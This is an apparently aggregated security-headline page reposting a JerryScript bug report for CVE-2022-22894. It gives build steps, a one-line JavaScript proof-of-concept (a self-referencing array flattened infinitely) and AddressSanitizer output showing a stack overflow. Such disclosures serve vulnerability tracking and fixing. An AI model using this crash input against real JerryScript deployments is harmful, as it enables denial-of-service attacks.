Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-22894: Stack-overflow in ecma_lcache_lookup (ecma-lcache.c) · Issue #4890 · jerryscript-project/jerryscript

Jerryscript 3.0.0 was discovered to contain a stack overflow via ecma_lcache_lookup in /jerry-core/ecma/base/ecma-lcache.c.

CVE
Open in Source
#ubuntu#linux#js

JerryScript revision

Commit: 51da1551

Version: v3.0.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --profile=es2015-subset --stack-limit=20

Test case

let array = new Array(1); array.splice(1, 0, array); array.flat(Infinity);

Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js

ASAN:DEADLYSIGNAL

==26613==ERROR: AddressSanitizer: stack-overflow on address 0xff535ffc (pc 0x5661347c bp 0xff536090 sp 0xff536000 T0) #0 0x5661347b in ecma_lcache_lookup /root/jerryscript/jerry-core/ecma/base/ecma-lcache.c:144 #1 0x569cde1f (/root/jerryscript/build/bin/jerry+0x477e1f)

SUMMARY: AddressSanitizer: stack-overflow /root/jerryscript/jerry-core/ecma/base/ecma-lcache.c:144 in ecma_lcache_lookup ==26613==ABORTING

Credits: Found by OWL337 team.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE